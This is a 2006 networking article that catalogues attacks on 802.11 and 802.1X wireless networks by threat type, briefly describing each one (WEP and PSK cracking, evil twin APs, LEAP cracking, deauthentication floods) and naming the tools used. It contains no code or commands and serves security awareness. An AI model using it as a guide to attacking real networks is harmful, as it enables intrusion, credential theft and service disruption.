Network Management Strategies for the CIO
Requires Free Membership to View
 |
||||
|
|
|||
|
||||
| Wireless Security Lunchtime Learning |
In our buzzword-filled industry, wrapping your arms around wireless attacks and their potential business impacts can be tough. This tip tries to bring order to this chaos by providing a reference list of attacks against 802.11 and 802.1X, categorized by type of threat, and mapped to associated hacker methods and tools.
Access control attacks
These attacks attempt to penetrate a network by using wireless or evading WLAN access control measures, like AP MAC filters and 802.1X port access controls.
| Type of Attack | Description | Methods and Tools |
| War Driving | Discovering wireless LANs by listening to beacons or sending probe requests, thereby providing launch point for further attacks. | DStumbler, KisMAC, MacStumbler, NetStumbler, WaveStumbler, Wellenreiter |
| Rogue Access Points | Installing an unsecured AP inside firewall, creating open backdoor into trusted network. | Any hardware or software AP |
| Ad Hoc Associations | Connecting directly to an unsecured station to circumvent AP security or to attack station. | Any wireless card or USB adapter |
| MAC Spoofing | Reconfiguring an attacker's MAC address to pose as an authorized AP or station. | Bwmachak, changemac.sh, SirMACsAlot, SMAC, Wellenreiter, wicontrol |
| 802.1X RADIUS Cracking | Recovering RADIUS secret by brute force from 802.1X access request, for use by evil twin AP. | Packet capture tool on LAN or network path between AP and RADIUS server |
Confidentiality attacks
These attacks attempt to intercept private information sent over wireless associations, whether sent in the clear or encrypted by 802.11 or higher layer protocols.
| Type of Attack | Description | Methods and Tools |
| Eavesdropping | Capturing and decoding unprotected application traffic to obtain potentially sensitive information. | bsd-airtools, Ethereal, Ettercap, Kismet, commercial analyzers |
| WEP Key Cracking | Capturing data to recover a WEP key using brute force or Fluhrer-Mantin-Shamir (FMS) cryptanalysis. | Aircrack, AirSnort, chopchop, dwepcrack, WepAttack, WepDecrypt, WepLab |
| Evil Twin AP | Masquerading as an authorized AP by beaconing the WLAN's service set identifier (SSID) to lure users. | cqureAP, HermesAP, HostAP, OpenAP, Quetec, WifiBSD |
| AP Phishing | Running a phony portal or Web server on an evil twin AP to "phish" for user logins, credit card numbers. | Airsnarf, Hotspotter |
| Man in the Middle | Running traditional man-in-the-middle attack tools on an evil twin AP to intercept TCP sessions or SSL/SSH tunnels. | dsniff, Ettercap |
Integrity attacks
These attacks send forged control, management or data frames over wireless to mislead the recipient or facilitate another type of attack (e.g., DoS).
| Type of Attack | Description | Methods and Tools |
| 802.11 Frame Injection | Crafting and sending forged 802.11 frames. | Airpwn, File2air, libradiate, void11, WEPWedgie, wnet dinject/reinject |
| 802.11 Data Replay | Capturing 802.11 data frames for later (modified) replay. | Capture + Injection Tools |
| 802.11 Data Deletion | Jamming an intended receiver to prevent delivery while simultaneously spoofing ACKs for deleted data frames. | Jamming + Injection Tools |
| 802.1X EAP Replay | Capturing 802.1X Extensible Authentication Protocols (e.g., EAP Identity, Success, Failure) for later replay. | Wireless Capture + Injection Tools between station and AP |
| 802.1X RADIUS Replay | Capturing RADIUS Access-Accept or Reject messages for later replay. | Ethernet Capture + Injection Tools between AP and authentication server |
Authentication attacks
Intruders use these attacks to steal legitimate user identities and credentials to access otherwise private networks and services.
| Type of Attack | Description | Methods and Tools |
| Shared Key Guessing | Attempting 802.11 Shared Key Authentication with guessed, vendor default or cracked WEP keys. | WEP Cracking Tools |
| PSK Cracking | Recovering a WPA PSK from captured key handshake frames using a dictionary attack tool. | coWPAtty, KisMAC, wpa_crack, wpa-psk-bf |
| Application Login Theft | Capturing user credentials (e.g., e-mail address and password) from cleartext application protocols. | Ace Password Sniffer, Dsniff, PHoss, WinSniffer |
| Domain Login Cracking | Recovering user credentials (e.g., Windows login and password) by cracking NetBIOS password hashes, using a brute-force or dictionary attack tool. | John the Ripper, L0phtCrack, Cain |
| VPN Login Cracking | Recovering user credentials (e.g., PPTP password or IPsec Preshared Secret Key) by running brute-force attacks on VPN authentication protocols. | ike_scan and ike_crack (IPsec), anger and THC-pptp-bruter (PPTP) |
| 802.1X Identity Theft | Capturing user identities from cleartext 802.1X Identity Response packets. | Capture Tools |
| 802.1X Password Guessing | Using a captured identity, repeatedly attempting 802.1X authentication to guess the user's password. | Password Dictionary |
| 802.1X LEAP Cracking | Recovering user credentials from captured 802.1X Lightweight EAP (LEAP) packets using a dictionary attack tool to crack the NT password hash. | Anwrap, Asleap, THC-LEAPcracker |
| 802.1X EAP Downgrade | Forcing an 802.1X server to offer a weaker type of authentication using forged EAP-Response/Nak packets. | File2air, libradiate |
Availability attacks
These attacks impede delivery of wireless services to legitimate users, either by denying them access to WLAN resources or by crippling those resources.
| Type of Attack | Description | Methods and Tools |
| AP Theft | Physically removing an AP from a public space. | "Five finger discount" |
| RF Jamming | Transmitting at the same frequency as the target WLAN, perhaps at a power that exceeds regulation Equivalent Isotopically Radiated Power (EIRP). | RF Jammer, Microwave oven, AP with Alchemy/HyperWRT firmware |
| Queensland DoS | Exploiting the CSMA/CA Clear Channel Assessment (CCA) mechanism to make a channel appear busy. | An adapter that supports CW Tx mode, with a low-level utility to invoke continuous transmit |
| 802.11 Beacon Flood | Generating thousands of counterfeit 802.11 beacons to make it hard for stations to find a legitimate AP. | FakeAP |
| 802.11 Associate / Authenticate Flood | Sending forged Authenticates or Associates from random MACs to fill a target AP's association table. | Airjack, File2air, Macfld, void11 |
| 802.11 TKIP MIC Exploit | Generating invalid TKIP data to exceed the target AP's MIC error threshold, suspending WLAN service. | File2air, wnet dinject |
| 802.11 Deauthenticate Flood | Flooding station(s) with forged Deauthenticates or Disassociates to disconnecting users from an AP. | Airjack, Omerta, void11 |
| 802.1X EAP-Start Flood | Flooding an AP with EAP-Start messages to consume resources or crash the target. | QACafe, File2air, libradiate |
| 802.1X EAP-Failure | Observing a valid 802.1X EAP exchange, and then sending the station a forged EAP-Failure message. | QACafe, File2air, libradiate |
| 802.1X EAP-of-Death | Sending a malformed 802.1X EAP Identity response known to cause some APs to crash. | QACafe, File2air, libradiate |
| 802.1X EAP Length Attacks | Sending EAP type-specific messages with bad length fields to try to crash an AP or RADIUS server. | QACafe, File2air, libradiate |
Note: Many of these tools can be found in the Auditor Security Collection, a KNOPPIX-based toolkit intended for use during penetration testing and vulnerability assessment.
>> Move to the next tip: Wi-Fi vulnerability assessment checklist
This was first published in April 2006
Join the conversationComment
Share
Comments
Results
Contribute to the conversation